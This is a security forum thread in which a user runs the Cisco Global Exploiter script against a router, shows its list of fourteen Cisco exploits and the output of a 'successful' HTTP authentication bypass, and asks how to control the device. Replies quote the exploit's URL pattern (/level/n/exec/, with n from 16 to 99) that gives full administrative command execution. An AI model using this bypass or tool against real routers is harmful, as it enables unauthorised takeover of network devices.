Cisco IOS HTTP Auth Vulnerability

[skull2006]

Hi,

I have Cisco Router i try play with it and i found this :

root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3

Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...

root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....

It give me Blank Page, so how i can go forward with this exploit?
what i can do to control the router?

best regards,

[ravbyte]

my answer it's a little out of thread, but i suggest to you, visit the nmap pen test list, there's a interest DoS thread, regards.

[KMDave]

Maybe you should check the documentation and read up what the specific exploit does or what it doesn't, which targets are vulnerable and so on.

[skull2006]

Maybe you should check the documentation and read up what the specific exploit does or what it doesn't, which targets are vulnerable and so on.

This is what Documentation says:

By sending a crafted URL it is possible to bypass authentication and execute any
command on the router at level 15 (enable level, the most privileged level).
This will happen only if the user is using a local database for authentication
(usernames and passwords are defined on the device itself).
The same URL will not be effective against every Cisco IOS software release and
hardware combination. However, there are only 84 different combinations to try,
so it would be easy for an attacker to test them all in a short period of time.
The URL in question follows this format :

http://<device_addres>/level/n/exec/....

where n is a number between 16 and 99.

An attacker can exercise complete control over the device.
By exploiting this vulnerability, the attacker can see and change the
configuration of the device.

that is make me ask that Q.

[KMDave]

Well did you check every 84 combinations?

[skull2006]

Well did you check every 84 combinations?

I don't know what is that ........ if you give me good start to make my first step.

thank you for your feedback man.

[Snayler]

??
It's all explained in your post...

http://<device_addres>/level/n/exec/....

where n is a number between 16 and 99. >> 84 possible combinations

[thorin]

what i can do to control the router?

Perhaps you should look at how it normally works... Then derive an answer for yourself after those observations?

It give me Blank Page

Are you running no-script or ad-block?

Or perhaps you shouldn't be futzing with things you don't understand.

[skull2006]

Or perhaps you shouldn't be futzing with things you don't understand.

If you have TFM send it to me or keep your word inside you.

[Snayler]

If you have TFM send it to me or keep your word inside you.

Thorin's right. You obviously don't understand what you're trying to do. And keep the bad attitude for you, we don't need it.